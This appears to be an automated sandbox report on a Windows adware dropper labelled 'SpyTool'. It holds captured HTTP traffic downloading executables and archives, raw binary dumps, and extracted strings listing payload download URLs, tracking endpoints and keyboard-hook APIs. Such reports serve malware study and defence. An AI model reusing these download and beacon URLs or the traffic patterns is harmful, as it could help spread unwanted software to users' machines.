Date: Wed, 02 Sep 2015 06:39:17 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1431408217"

Last-Modified: Tue, 12 May 2015 05:23:37 GMT

Cache-Control: max-age=6313

Content-Length: 8076624

Content-Type: text/plain; charset=UTF-8

X-HW: 1441175957.dop018.am4.t,1441175957.cds037.am4.c

PK.........A.F....5.G.5.G.....chrome.packed.7z7z..'...X=.A..G.............4Q.J......8%D.i..."...8Z.z ..M.l.S.3...%......a...CE....JS,...o9..?.K.,.H......55G.....4....&.57c.Cc.b..(..r..dg...}.I.:l...M...s...L.....I.[... .h...S....Q.T...P%.G3....J.....-?........~97........~.$.BE..%....!..^9X........>....P....k......M3....W.W..r ..4..Jf.d*L_.l..V5Z..m......w..u....r.\.O.D...3T...[".E....A.ME?j....o......&t.7.v........G".....)k.y.V0...^)..1C7...b..n...W1.k.3a....G...........C.[....W....@t..X.lOU...hL..lT.)...`.;1.8}.2|.P..Z....!hn..I..u....R...l.=.....).i.H....K.p...5y.a`..S].$./...i.Y...X........lC 6..b..T..D|....X <v........rny).4.>...c..zE..h...>....,.,...Q..X...dW,.& G>.../..b.c...e...sOn..t..gX.v.. ...4S4]x'.h..E..-.c.|.....C.w..g..h...`9`c.......:..7.......!...Q.9Q\..h...@.(...g.C.!...TC.5.>t...?(|I..@B'z H%^..J...JDB.T/.&K1.9..f. .\......[...8fg%l/.l"..|.(..h}.M.t.5.Q......`\.B..Dg..,skG...5.....i.r.7O..C....M...!......P.D.a.i...zH.}....../......" .i...Z.b..i..,..V..L.....G..(.j..T.:3{7...k\..`.=.&.QC.)...5&...k..........\...L..ps,.".;........lt......)...zB.....]W/.H(` 0....v...j.....~...p..........V.O.Tt{..GbMH.g...!......V....Q..s<......SA.Rna.>...I..|.....PT..E$...9^'UI..I.y6.v ... .D.T.)..3=(z.u.:L...B..<.q..'i...X.{..........B.."k...@.I...C.e)..}.....Q......Q...m.!...b1.qf.7.P<.....G....m...........a..Y..T>.............W....su..J..U..9!...M..G...(.Z....;Yy....H......j.....cR..........Z%........%..&Z.i.y...@">...;..b..DYJ.1...]JZ.A..,-.m..qI.......X9.....@..@....$.o...

<<< skipped >>>

POST / HTTP/1.1

Content-Type: application/x-www-form-urlencoded

User-Agent: NSIS_Inetc (Mozilla)

Host: ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

Content-Length: 124

Connection: Keep-Alive

Cache-Control: no-cache

{"table": "event_has_user","data": "{\"event_event_id\": \"4605\",\"channel_id\": \"\", \"utm_addition\":\"vpol=iml&v=2\"}"}

HTTP/1.1 200 OK

Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept

Access-Control-Allow-Origin: *

Content-Type: text/html; charset=utf-8

Date: Wed, 02 Sep 2015 06:39:58 GMT

X-Powered-By: Express

Content-Length: 15

Connection: keep-alive

{"Status":"OK"}HTTP/1.1 200 OK..Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept..Access-Control-Allow-Origin: *..Content-Type: text/html; charset=utf-8..Date: Wed, 02 Sep 2015 06:39:58 GMT..X-Powered-By: Express..Content-Length: 15..Connection: keep-alive..{"Status":"OK"}..

GET /cgi-bin/advert/settags?x_mode=args&x_format=javascript&x_dp_id=1203&x_pub_id=131221&tag=RE_CLICKMEIN_INSTALL_FIN HTTP/1.1

Content-Type: application/x-www-form-urlencoded

Accept: */*

User-Agent: Mozilla/4.0 (compatible; Win32; WinHttp.WinHttpRequest.5)

Host: ads.regiedepub.com

Connection: Keep-Alive

HTTP/1.1 200 OK

Date: Wed, 02 Sep 2015 06:39:45 GMT

Server: Apache/2.2.16 (Debian) mod_ssl/2.2.16 OpenSSL/0.9.8o mod_wsgi/3.3 Python/2.6.6 mod_perl/2.0.4 Perl/v5.10.1

Content-Location: settags.cgi

Vary: negotiate

TCN: choice

Cache-Control: no-store, no-cache, must-revalidate

X-C4PC-ServerName: ads.regiedepub.com

P3P: policyref="hXXp://ads.regiedepub.com/w3c/p3p.xml",CP="NON DSP COR CURa PSA PSD OUR BUS NAV STA"

Expires: Wed, 02 Sep 15 06:39:00 GMT

Set-Cookie: _c4aid=6823647C64484072ADCCEDCE0883B176; expires=Mon, 29 Feb 16 06:39:00 GMT; domain=regiedepub.com; path=/;

Set-Cookie: _c4aid2=6823647C64484072ADCCEDCE0883B176,1441175985.6349; expires=Mon, 29 Feb 16 06:39:00 GMT; domain=regiedepub.com; path=/;

Connection: close

Transfer-Encoding: chunked

Content-Type: text/javascript

41.......if (window.rdp_callback).....rdp_callback(1203, 131221);......0..

GET /crossbrowse/ie/106/ie.zip.003 HTTP/1.1

Accept: */*

Accept-Encoding: gzip, deflate

Host: zip.rgbdomsrv.com

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Wed, 02 Sep 2015 06:39:16 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1431408217"

Last-Modified: Tue, 12 May 2015 05:23:37 GMT

Cache-Control: max-age=6311

Content-Length: 8076624

Content-Type: text/plain; charset=UTF-8

X-HW: 1441175957.dop018.am4.t,1441175956.cds036.am4.c

..4Ll.....a......|a../...y.R1.bR. ..Rv.u'.c..o.....{.......5NkM.0.....y./..4.....(.Uw.m3......}....@z.....7..2.c.wv..Q...o.y9.L..1.lBn.PFt_.5..(.........Ll..].n].E$.....,.../.....DF.<.[ B...Z...#Z..WWd...$..k....>*...o)&.5.>.......b..2........#.U.ui.........[.P.s.?...-.....C....A..fv...Z.:..H<........A...>Y..}..RJ.....dO...*].@4..U..?$..<.j.DF......4...j.?b~m...l..R"...,x.4.....[A..V.Nj.......t..@..G.......I.K..2U.............r.k..5Xn%..W.4...L.(.....f..h.Z.S.m;..9.....#.....o....r....Y.&..r..hU..e..P......6...`..-g.... ..tL..We`r...1.|..l....P$.GQ.!R.......C~.v........ ..H....a6.....B.....{.....=...\P?...}.i..]m....?F..3|T.QE..Sq.U.rz<u..t..... ..@..,...$D.\P..m.B..ePhy.f.V.......M..XI.k3.g.......gP....(..&~N..ik\..<.......!U..g..3.....^t...@.$..F....2.....t.?...........]....r......~...2,P........"..g.8...L.K....J6CP/.|..d=.`.....UsOP.Bl(nilW.......[<..,.......l........5....p,w8t.....L9;.U....K/6.P............J....o#L~.@.....x..G..N.Wf.N...><4o.ha...].v.......P....f.c......$l..j........I....y...Iw....S.vwW.3..c.......E...(..S$l...su{P:"XW..<.-.OU$6....YD.L4..p.9......W;....h.e..r<.p..I..=.......&......9..&..}.#.......sX;u.)...Es/a.....:.J.L.L...T"..E..O...[hzg.s..eT...9..(....7.SL......V.;....a80....Mdd-..'/....j......p'u.............z.-#:..q..<...h..`.........0..|.U.GG.0.f.c.....m.D....~T..m..(...zv..$..s..c......{..........)....z....:..H...)...B.j.L..J........U.j..Q..K:.....u-z..`.F3O...U..v.....p...........K`.........I..Anw..d..Hq.......vah..5A......|....t.Iy.BI....

<<< skipped >>>

GET /VuuPC_VO2_8907.exe HTTP/1.1

User-Agent: NSIS_Inetc (Mozilla)

Host: secured.nmsgv.us

Connection: Keep-Alive

Cache-Control: no-cache

HTTP/1.1 200 OK

Date: Wed, 02 Sep 2015 06:39:59 GMT

Keep-Alive: timeout=10, max=100

Connection: Keep-Alive

Accept-Ranges: bytes

ETag: "1441114670"

Last-Modified: Tue, 01 Sep 2015 13:37:50 GMT

Cache-Control: max-age=25558

Content-Length: 230012

Content-Type: application/octet-stream

X-HW: 1441176000.dop017.am4.t,1441175999.cds043.am4.c

MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1..:u..iu..iu..i...iw..iu..i...i...id..i!..i...i...it..iRichu..i........................PE..L......K.................^....... ...0.......p....@.......................... 8..............................................t........7..?...........................................................................p...............................text...L\.......^.................. ..`.rdata.......p.......b..............@..@.data...X............v..............@....ndata....2.. ...........................rsrc....?....7..@...z..............@..@........................................................................................................................................................................................................................................................................................................................................................................U....\.}..t .}.F.E.u..H....h.E..H.P.u..u..u...Hr@..B...SV.5p.E..E.WP.u...Lr@..e...E..E.P.u...Pr@..}..e....Dp@........FR..VV..U... M.......M....3.....FQ.....NU..M..........VT..U.....FP..E...............E.P.M...Hp@..E...E.P.E.P.u...Tr@..u....E..9}...w....~X.te.v4..Lp@....E.tU.}.j.W.E......E.......Pp@..vXW..Tp@..u..5Xp@.W...E..E.h ...Pj.h`.D.W..Xr@..u.W...u....E.P.u...\r@._^3.[.....L$....E...Si.. ..VW.T.....tO.q.3.;5..E.sB..i.. ...D.......t.G.....t...O..t .....u...3....3...F.. ..;5..E.r._^[...U..QQ.U.SV..i.. .

<<< skipped >>>

Map

The SpyTool connects to the servers at the folowing location(s):

Strings from Dumps

%original file name%.exe_1504:

.text

.text

`.rdata

`.rdata

@.data

@.data

.ndata

.ndata

.rsrc

.rsrc

uDSSh

uDSSh

.DEFAULT\Control Panel\International

.DEFAULT\Control Panel\International

Software\Microsoft\Windows\CurrentVersion

Software\Microsoft\Windows\CurrentVersion

GetWindowsDirectoryA

GetWindowsDirectoryA

KERNEL32.dll

KERNEL32.dll

ExitWindowsEx

ExitWindowsEx

USER32.dll

USER32.dll

GDI32.dll

GDI32.dll

SHFileOperationA

SHFileOperationA

ShellExecuteA

ShellExecuteA

SHELL32.dll

SHELL32.dll

RegEnumKeyA

RegEnumKeyA

RegCreateKeyExA

RegCreateKeyExA

RegCloseKey

RegCloseKey

RegDeleteKeyA

RegDeleteKeyA

RegOpenKeyExA

RegOpenKeyExA

ADVAPI32.dll

ADVAPI32.dll

COMCTL32.dll

COMCTL32.dll

ole32.dll

ole32.dll

VERSION.dll

VERSION.dll

verifying installer: %d%%

verifying installer: %d%%

unpacking data: %d%%

unpacking data: %d%%

... %d%%

... %d%%

hXXp://nsis.sf.net/NSIS_Error

hXXp://nsis.sf.net/NSIS_Error

~nsu.tmp

~nsu.tmp

%u.%u%s%s

%u.%u%s%s

RegDeleteKeyExA

RegDeleteKeyExA

%s=%s

%s=%s

*?|/":

*?|/":

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq3D.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq3D.tmp

360TotalSecurity.exe

360TotalSecurity.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp\inetc.dll

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp\inetc.dll

hXXp://VVV.codec13sudha.com/download.php?l4J9dw==

hXXp://VVV.codec13sudha.com/download.php?l4J9dw==

62.exe&errorlevel=0

62.exe&errorlevel=0

hXXp://download-servers.com/partners/360/360TotalSecurity.exe

hXXp://download-servers.com/partners/360/360TotalSecurity.exe

System.dll

System.dll

callback%d

callback%d

@.reloc

@.reloc

u.Uj@

u.Uj@

MSVCRT.dll

MSVCRT.dll

HttpSendRequestA

HttpSendRequestA

HttpSendRequestExA

HttpSendRequestExA

HttpQueryInfoA

HttpQueryInfoA

FtpCreateDirectoryA

FtpCreateDirectoryA

FtpOpenFileA

FtpOpenFileA

HttpOpenRequestA

HttpOpenRequestA

HttpAddRequestHeadersA

HttpAddRequestHeadersA

HttpEndRequestA

HttpEndRequestA

InternetCrackUrlA

InternetCrackUrlA

WININET.dll

WININET.dll

inetc.dll

inetc.dll

Open URL Error

Open URL Error

URL Parts Error

URL Parts Error

FtpCreateDir failed (550)

FtpCreateDir failed (550)

Error FTP path (550)

Error FTP path (550)

Downloading %s

Downloading %s

%dkB (%d%%) of %dkB @ %d.dkB/s

%dkB (%d%%) of %dkB @ %d.dkB/s

(%d %s%s remaining)

(%d %s%s remaining)

REST %d

REST %d

SIZE %s

SIZE %s

Content-Length: %d

Content-Length: %d

Content-Type: application/x-www-form-urlencoded

Content-Type: application/x-www-form-urlencoded

Authorization: basic %s

Authorization: basic %s

Proxy-authorization: basic %s

Proxy-authorization: basic %s

%s:%s

%s:%s

FtpCommandA

FtpCommandA

wininet.dll

wininet.dll

%u MB

%u MB

%u kB

%u kB

%u bytes

%u bytes

%d:d:d

%d:d:d

%s - %s

%s - %s

(Err=%d)

(Err=%d)

NSIS_Inetc (Mozilla)

NSIS_Inetc (Mozilla)

Filename: %s

Filename: %s

/password

/password

Uploading %s

Uploading %s

8!8-8B8I8}8

8!8-8B8I8}8

6.xMn

6.xMn

*A&q.WouU1

*A&q.WouU1

w.rEZ

w.rEZ

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn3E.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsn3E.tmp

nsn3E.tmp

nsn3E.tmp

//livestatscounter.com/Generic/vos.php?ch=

//livestatscounter.com/Generic/vos.php?ch=

8ed6718599ebcc64cea4819f60c087.exe

8ed6718599ebcc64cea4819f60c087.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq3D.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsq3D.tmp

Uninstall.exe

Uninstall.exe

n.php?r=vu_vo2_

n.php?r=vu_vo2_

d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe

d2fpsq9kg43yka.cloudfront.net/cmmdWriter.exe

c:\%original file name%.exe

c:\%original file name%.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp

%original file name%.exe

%original file name%.exe

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy1.tmp

CUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsy1.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsj3.tmp

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://VVV.codec13sudha.com/download.php?l4J9dw==&v=2\"}"}

{"table": "event_has_user","data": "{\"event_event_id\": \"1722\",\"channel_id\": \"NOCHPC\", \"utm_addition\":\"url=hXXp://VVV.codec13sudha.com/download.php?l4J9dw==&v=2\"}"}

hXXp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

hXXp://ibf-cmi-1938953175.us-east-1.elb.amazonaws.com

url=hXXp://VVV.codec13sudha.com/download.php?l4J9dw==

url=hXXp://VVV.codec13sudha.com/download.php?l4J9dw==

com/setup_362.exe

com/setup_362.exe

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsb6.tmp

C:\DOCUME~1\"%CurrentUserName%"\LOCALS~1\Temp\nsb6.tmp

dlgen.php?r=vu_vo2_

dlgen.php?r=vu_vo2_

)-.Yln

)-.Yln

Nullsoft Install System v2.46

Nullsoft Install System v2.46

555555555555

555555555555

1.0.0.1

1.0.0.1

upgmsd_re_005010077.exe_1364:

.text

.text

`.rdata

`.rdata

@.data

@.data

.rsrc

.rsrc

@.reloc

@.reloc

RSSSSSSh

RSSSSSSh

t.hX0f

t.hX0f

QSShh

QSShh

tFHt:Ht.Ht"Hu`

tFHt:Ht.Ht"Hu`

SSSSh

SSSSh

u$SShe

u$SShe

tWSShW

tWSShW

tl9_ tgSSh

tl9_ tgSSh

t'SShl

t'SShl

SSSShx

SSSShx

j%XtL9E

j%XtL9E

FtPW

FtPW

SSh@B

SSh@B

u.SSh

u.SSh

tsSSh

tsSSh

FTCP

FTCP

t.WWWSP

t.WWWSP

tAHt.HHt

tAHt.HHt

FTPS

FTPS

u)SShF

u)SShF

s%j.Zf

s%j.Zf

xSSSh

xSSSh

FTPjKS

FTPjKS

FtPj;S

FtPj;S

C.PjRV

C.PjRV

operand of unlimited repeat could match the empty string

operand of unlimited repeat could match the empty string

POSIX named classes are supported only within a class

POSIX named classes are supported only within a class

erroffset passed as NULL

erroffset passed as NULL

POSIX collating elements are not supported

POSIX collating elements are not supported

this version of PCRE is not compiled with PCRE_UTF8 support

this version of PCRE is not compiled with PCRE_UTF8 support

PCRE does not support \L, \l, \N, \U, or \u

PCRE does not support \L, \l, \N, \U, or \u

support for \P, \p, and \X has not been compiled

support for \P, \p, and \X has not been compiled

(*VERB) with an argument is not supported

(*VERB) with an argument is not supported

!"#$%&'((()* ,-./01

!"#$%&'((()* ,-./01

CNotSupportedException

CNotSupportedException

CCmdTarget

CCmdTarget

RegOpenKeyTransactedW

RegOpenKeyTransactedW

RegCreateKeyTransactedW

RegCreateKeyTransactedW

RegDeleteKeyTransactedW

RegDeleteKeyTransactedW

CFtpFileFind

CFtpFileFind

CHttpConnection

CHttpConnection

CFtpConnection

CFtpConnection

CHttpFile

CHttpFile

RegDeleteKeyExW

RegDeleteKeyExW

TaskDialogIndirect

TaskDialogIndirect

CMDITabProxyWnd

CMDITabProxyWnd

CMDIChildWndEx

CMDIChildWndEx

CMDIFrameWndEx

CMDIFrameWndEx

CMDIChildWnd

CMDIChildWnd

CMDIFrameWnd

CMDIFrameWnd

CMDIClientAreaWnd

CMDIClientAreaWnd

CHotKeyCtrl

CHotKeyCtrl

CMFCToolBarsKeyboardPropertyPage

CMFCToolBarsKeyboardPropertyPage

GetProcessWindowStation

GetProcessWindowStation

operator

operator

portuguese-brazilian

portuguese-brazilian

qR.Rd

qR.Rd

Visual C CRT: Not enough memory to complete call to strerror.

Visual C CRT: Not enough memory to complete call to strerror.

Broken pipe

Broken pipe

Inappropriate I/O control operation

Inappropriate I/O control operation

Operation not permitted

Operation not permitted

%%X

%%X

RegSetKeySecurity error! (rc=%lu)

RegSetKeySecurity error! (rc=%lu)

Key not found.

Key not found.

Error opening key.

Error opening key.

ntdll.dll

ntdll.dll

?456789:;

?456789:;

!"#$%&'()* ,-./0123

!"#$%&'()* ,-./0123

LookupPrivilegeValue error: %u

LookupPrivilegeValue error: %u

twrejsg$45dsfdfs23534544jryubyjubmmtreycy52345&/%(&(/gaagdsagdshbdfhgsagds&(%&(%jgsfg4567;;;;%%%%564&&&ygfhfghhfgrthth45234523453452rtfghjfghjfghjffgfdgdfg.,df.g,dhgdfhgfhdf...fhg.h.dfg.sd,fg.sg,f.sd,hrthrthrthdfgh56456456jhtr56uy56u56u56u56tgiuergiuerhgpuherguherguherguetrguhertoueugh

twrejsg$45dsfdfs23534544jryubyjubmmtreycy52345&/%(&(/gaagdsagdshbdfhgsagds&(%&(%jgsfg4567;;;;%%%%564&&&ygfhfghhfgrthth45234523453452rtfghjfghjfghjffgfdgdfg.,df.g,dhgdfhgfhdf...fhg.h.dfg.sd,fg.sg,f.sd,hrthrthrthdfgh56456456jhtr56uy56u56u56u56tgiuergiuerhgpuherguherguherguetrguhertoueugh

eriutheriutgjhtadfjtyjtygfhfghhfhgerty.h.d742452d455agasagsfagsaggfvhgh sdfsasdf445afgdsdgasdgfasdgsdg6353651rf/(%/)%/(sdfdfg45345345fg.sd,fg.sg,f.sd,hrthrthrthdfgh56456456jhtr56uy56u56u56u56tgiuergiuerhgpuherguherguherguetrguhertoueugh

eriutheriutgjhtadfjtyjtygfhfghhfhgerty.h.d742452d455agasagsfagsaggfvhgh sdfsasdf445afgdsdgasdgfasdgsdg6353651rf/(%/)%/(sdfdfg45345345fg.sd,fg.sg,f.sd,hrthrthrthdfgh56456456jhtr56uy56u56u56u56tgiuergiuerhgpuherguherguherguetrguhertoueugh

ertyr56u56u56adfhafdsfghgu5dasfsfdfsadfsaddfdfs1gsdfhjfhgdfgsgsdfadadsfasdffsgbhgbgfaafsdgafsgafsgagsgaafsdasdfsfasadsgasdgsgdfa5634453.dfgsd.&&%//(/&)($&/&$/fg,d.fg,sfa4564564563456356fthrthrthrthrfthrt5656u6ethyrthjrthjrethjrthjerthjertjherthjrthjtrhjrthj

ertyr56u56u56adfhafdsfghgu5dasfsfdfsadfsaddfdfs1gsdfhjfhgdfgsgsdfadadsfasdffsgbhgbgfaafsdgafsgafsgagsgaafsdasdfsfasadsgasdgsgdfa5634453.dfgsd.&&%//(/&)($&/&$/fg,d.fg,sfa4564564563456356fthrthrthrthrfthrt5656u6ethyrthjrthjrethjrthjerthjertjherthjrthjtrhjrthj

rthrthr$%&.fg,hjfgkhsdfghhdsagdfgu56yu56u6uafdsasfsdfasfas5463456afhgjhh45645645gassavdfghcvhbvhdasdsasd656u56rthrthrthrthtrhrthtrhrthtrhtrhtrhrth

rthrthr$%&.fg,hjfgkhsdfghhdsagdfgu56yu56u6uafdsasfsdfasfas5463456afhgjhh45645645gassavdfghcvhbvhdasdsasd656u56rthrthrthrthtrhrthtrhrthtrhtrhtrhrth

Error %d: Could not begin update of %s

Error %d: Could not begin update of %s

Error %d: Updating resource

Error %d: Updating resource

!"#$%&'()* ,-./:;?@[\]^_`{|}~

!"#$%&'()* ,-./:;?@[\]^_`{|}~

C:\appbuilder_2.0_multiinstall\Release\temp.pdb

C:\appbuilder_2.0_multiinstall\Release\temp.pdb

IPHLPAPI.DLL

IPHLPAPI.DLL

PSAPI.DLL

PSAPI.DLL

GetProcessHeap

GetProcessHeap

GetWindowsDirectoryW

GetWindowsDirectoryW

GetCPInfo

GetCPInfo

KERNEL32.dll

KERNEL32.dll

GetKeyState

GetKeyState

SetWindowsHookExW

SetWindowsHookExW

CreateDialogIndirectParamW

CreateDialogIndirectParamW

UnhookWindowsHookEx

UnhookWindowsHookEx

MsgWaitForMultipleObjectsEx

MsgWaitForMultipleObjectsEx

GetAsyncKeyState

GetAsyncKeyState

MapVirtualKeyW

MapVirtualKeyW

GetKeyboardLayout

GetKeyboardLayout

GetKeyboardState

GetKeyboardState

GetKeyNameTextW

GetKeyNameTextW

MapVirtualKeyExW

MapVirtualKeyExW

EnumChildWindows

EnumChildWindows

USER32.dll

USER32.dll

GetViewportExtEx

GetViewportExtEx

SetViewportOrgEx

SetViewportOrgEx

OffsetViewportOrgEx

OffsetViewportOrgEx

SetViewportExtEx

SetViewportExtEx

ScaleViewportExtEx

ScaleViewportExtEx

GetViewportOrgEx

GetViewportOrgEx

GDI32.dll

GDI32.dll

MSIMG32.dll

MSIMG32.dll

COMDLG32.dll

COMDLG32.dll

WINSPOOL.DRV

WINSPOOL.DRV

RegLoadKeyW

RegLoadKeyW

RegUnLoadKeyW

RegUnLoadKeyW

RegOpenKeyExW

RegOpenKeyExW

RegCloseKey

RegCloseKey

RegCreateKeyExW

RegCreateKeyExW

RegSetKeySecurity

RegSetKeySecurity

RegDeleteKeyW

RegDeleteKeyW

RegEnumKeyExW

RegEnumKeyExW

RegQueryInfoKeyW

RegQueryInfoKeyW

RegEnumKeyW

RegEnumKeyW

ADVAPI32.dll

ADVAPI32.dll

ShellExecuteW

ShellExecuteW

ShellExecuteExW

ShellExecuteExW

SHELL32.dll

SHELL32.dll

COMCTL32.dll

COMCTL32.dll

UrlUnescapeW

UrlUnescapeW

SHLWAPI.dll

SHLWAPI.dll

ole32.dll

ole32.dll

OLEAUT32.dll

OLEAUT32.dll

oledlg.dll

oledlg.dll

OLEACC.dll

OLEACC.dll

InternetCrackUrlW

InternetCrackUrlW

HttpOpenRequestW

HttpOpenRequestW

HttpSendRequestW

HttpSendRequestW

HttpQueryInfoW

HttpQueryInfoW

InternetCanonicalizeUrlW

InternetCanonicalizeUrlW

FtpDeleteFileW

FtpDeleteFileW

FtpRenameFileW

FtpRenameFileW

FtpCreateDirectoryW

FtpCreateDirectoryW

FtpRemoveDirectoryW

FtpRemoveDirectoryW

FtpSetCurrentDirectoryW

FtpSetCurrentDirectoryW

FtpGetCurrentDirectoryW

FtpGetCurrentDirectoryW

FtpPutFileW

FtpPutFileW

FtpGetFileW

FtpGetFileW

HttpAddRequestHeadersW

HttpAddRequestHeadersW

HttpEndRequestW

HttpEndRequestW

HttpSendRequestExW

HttpSendRequestExW

FtpOpenFileW

FtpOpenFileW

FtpCommandW

FtpCommandW

FtpFindFirstFileW

FtpFindFirstFileW

InternetOpenUrlW

InternetOpenUrlW

WININET.dll

WININET.dll

GdiplusShutdown

GdiplusShutdown

gdiplus.dll

gdiplus.dll

IMM32.dll

IMM32.dll

WINMM.dll

WINMM.dll

.PAVCOleException@@

.PAVCOleException@@

.PAVCException@@

.PAVCException@@

.PAVCObject@@

.PAVCObject@@

.PAVCMemoryException@@

.PAVCMemoryException@@

.PAVCSimpleException@@

.PAVCSimpleException@@

.PAVCNotSupportedException@@

.PAVCNotSupportedException@@

.PAVCInvalidArgException@@

.PAVCInvalidArgException@@

.?AVCNotSupportedException@@

.?AVCNotSupportedException@@

.PAVCArchiveException@@

.PAVCArchiveException@@

.?AVCCmdUI@@

.?AVCCmdUI@@

.?AVCTestCmdUI@@

.?AVCTestCmdUI@@

.PAVCUserException@@

.PAVCUserException@@

.PAVCResourceException@@

.PAVCResourceException@@

.?AVCFtpFileFind@@

.?AVCFtpFileFind@@

.?AVCFtpConnection@@

.?AVCFtpConnection@@

.?AVCHttpConnection@@

.?AVCHttpConnection@@

.?AVCHttpFile@@

.?AVCHttpFile@@

.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@

.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0BAA@@ATL@@

.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@

.?AV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@

.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0EA@@ATL@@

.?AV?$CFixedStringT@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@$0EA@@ATL@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WV12@PB_W@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WV12@PB_W@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCDocument@@PAV3@@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCDocument@@PAV3@@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W_N_N@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W_N_N@@

.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@

.?AV?$CMap@PAVCDocument@@PAV1@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@

.?AVCToolCmdUI@@

.?AVCToolCmdUI@@

.?AVCMDITabProxyWnd@@

.?AVCMDITabProxyWnd@@

.?AVCMDIChildWndEx@@

.?AVCMDIChildWndEx@@

.?AVCMDIChildWnd@@

.?AVCMDIChildWnd@@

.?AVCMDIFrameWndEx@@

.?AVCMDIFrameWndEx@@

.?AVCMDIFrameWnd@@

.?AVCMDIFrameWnd@@

.?AVCMFCToolBarCmdUI@@

.?AVCMFCToolBarCmdUI@@

.?AVCKeyboardManager@@

.?AVCKeyboardManager@@

.PAVCOleDispatchException@@

.PAVCOleDispatchException@@

.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@

.?AV?$CList@PAVCMDIChildWndEx@@PAV1@@@

.?AVCMDIClientAreaWnd@@

.?AVCMDIClientAreaWnd@@

.?AVCMFCRibbonCmdUI@@

.?AVCMFCRibbonCmdUI@@

.?AV?$CArray@PAVCMFCRibbonKeyTip@@PAV1@@@

.?AV?$CArray@PAVCMFCRibbonKeyTip@@PAV1@@@

.?AVCMFCWindowsManagerDialog@@

.?AVCMFCWindowsManagerDialog@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAUHMENU__@@PAU3@@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAUHMENU__@@PAU3@@@

.?AVCMFCCmdUsageCount@@

.?AVCMFCCmdUsageCount@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCObList@@PAV3@@@

.?AV?$CMap@V?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_WPAVCObList@@PAV3@@@

.?AVCMFCColorBarCmdUI@@

.?AVCMFCColorBarCmdUI@@

.?AV?$CMap@KKV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@

.?AV?$CMap@KKV?$CStringT@_WV?$StrTraitMFC@_WV?$ChTraitsCRT@_W@ATL@@@@@ATL@@PB_W@@

.?AVCMFCStatusBarCmdUI@@

.?AVCMFCStatusBarCmdUI@@

.?AVCMFCAcceleratorKey@@

.?AVCMFCAcceleratorKey@@

.?AVCHotKeyCtrl@@

.?AVCHotKeyCtrl@@

.?AVCMFCRibbonKeyTip@@

